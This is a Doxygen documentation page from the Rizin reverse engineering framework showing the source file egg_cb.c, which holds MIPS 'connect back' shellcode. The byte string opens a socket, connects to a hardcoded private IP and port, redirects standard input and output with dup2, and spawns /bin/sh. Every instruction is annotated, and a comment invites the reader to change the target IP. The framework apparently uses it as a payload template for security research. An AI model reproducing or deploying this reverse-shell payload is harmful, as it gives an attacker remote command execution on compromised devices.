Rizin
unix-like reverse engineering framework and cli tools
Main Page
Related Pages
Modules
Namespaces
Namespace List
Namespace Members
All
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
r
s
t
u
v
w
x
z
Functions
_
a
b
c
d
e
f
g
h
i
l
m
n
p
r
s
t
u
v
w
Variables
_
a
b
c
d
e
f
g
h
i
k
l
m
n
o
p
r
s
t
u
v
w
x
z
Enumerations
Classes
Class List
Class Index
Class Hierarchy
Class Members
All
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
~
Functions
_
a
b
c
d
e
f
g
h
i
l
m
o
p
r
s
t
u
v
w
x
z
~
Variables
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
Enumerations
Enumerator
b
d
e
h
i
k
n
p
r
s
w
Properties
Events
Related Functions
Files
File List
File Members
All
$
.
[
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
Functions
[
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
Variables
$
.
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
Typedefs
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
z
Enumerations
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
r
s
t
u
v
w
x
y
z
Enumerator
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
Macros
_
a
b
c
d
e
f
g
h
i
j
k
l
m
n
o
p
q
r
s
t
u
v
w
x
y
z
•
All
Classes
Namespaces
Files
Functions
Variables
Typedefs
Enumerations
Enumerator
Properties
Events
Friends
Macros
Modules
Pages
egg_cb.c
Go to the documentation of this file.
1
// SPDX-FileCopyrightText: 2011 pancake <pancake@nopcode.org>
2
// SPDX-License-Identifier: LGPL-3.0-only
3
4
/* connect back shellcodes */
5
// mips
6
static
char
sc
[] =
7
"\x24\x0f\xff\xfd"
// li t7,-3
8
"\x01\xe0\x20\x27"
// nor a0,t7,zero
9
"\x01\xe0\x28\x27"
// nor a1,t7,zero
10
"\x28\x06\xff\xff"
// slti a2,zero,-1
11
"\x24\x02\x10\x57"
// li v0,4183 ( sys_socket )
12
"\x01\x01\x01\x0c"
// syscall 0x40404
13
14
"\xaf\xa2\xff\xff"
// sw v0,-1(sp)
15
"\x8f\xa4\xff\xff"
// lw a0,-1(sp)
16
"\x24\x0f\xff\xfd"
// li t7,-3 ( sa_family = AF_INET )
17
"\x01\xe0\x78\x27"
// nor t7,t7,zero
18
"\xaf\xaf\xff\xe0"
// sw t7,-32(sp)
19
"\x3c\x0e\x7a\x69"
// lui t6,0x7a69 ( sin_port = 0x7a69 )
20
"\x35\xce\x7a\x69"
// ori t6,t6,0x7a69
21
"\xaf\xae\xff\xe4"
// sw t6,-28(sp)
22
23
/* ==================== You can change ip here ;) ====================== */
24
"\x3c\x0d\xc0\xa8"
// lui t5,0xc0a8 ( sin_addr = 0xc0a8 ...
25
"\x35\xad\x01\x64"
// ori t5,t5,0x164 ...0164 )
26
/* ====================================================================== */
27
28
"\xaf\xad\xff\xe6"
// sw t5,-26(sp)
29
"\x23\xa5\xff\xe2"
// addi a1,sp,-30
30
"\x24\x0c\xff\xef"
// li t4,-17 ( addrlen = 16 )
31
"\x01\x80\x30\x27"
// nor a2,t4,zero
32
"\x24\x02\x10\x4a"
// li v0,4170 ( sys_connect )
33
"\x01\x01\x01\x0c"
// syscall 0x40404
34
35
"\x24\x0f\xff\xfd"
// li t7,-3
36
"\x01\xe0\x28\x27"
// nor a1,t7,zero
37
"\x8f\xa4\xff\xff"
// lw a0,-1(sp)
38
// dup2_loop:
39
"\x24\x02\x0f\xdf"
// li v0,4063 ( sys_dup2 )
40
"\x01\x01\x01\x0c"
// syscall 0x40404
41
"\x20\xa5\xff\xff"
// addi a1,a1,-1
42
"\x24\x01\xff\xff"
// li at,-1
43
"\x14\xa1\xff\xfb"
// bne a1,at, dup2_loop
44
45
"\x28\x06\xff\xff"
// slti a2,zero,-1
46
"\x3c\x0f\x2f\x2f"
// lui t7,0x2f2f
47
"\x35\xef\x62\x69"
// ori t7,t7,0x6269
48
"\xaf\xaf\xff\xf4"
// sw t7,-12(sp)
49
"\x3c\x0e\x6e\x2f"
// lui t6,0x6e2f
50
"\x35\xce\x73\x68"
// ori t6,t6,0x7368
51
"\xaf\xae\xff\xf8"
// sw t6,-8(sp)
52
"\xaf\xa0\xff\xfc"
// sw zero,-4(sp)
53
"\x27\xa4\xff\xf4"
// addiu a0,sp,-12
54
"\x28\x05\xff\xff"
// slti a1,zero,-1
55
"\x24\x02\x0f\xab"
// li v0,4011 ( sys_execve )
56
"\x01\x01\x01\x0c"
;
// syscall 0x40404
sc
static char sc[]
Definition:
egg_cb.c:6
librz
egg
p
egg_cb.c
Generated by
1.9.1
1.9.1 
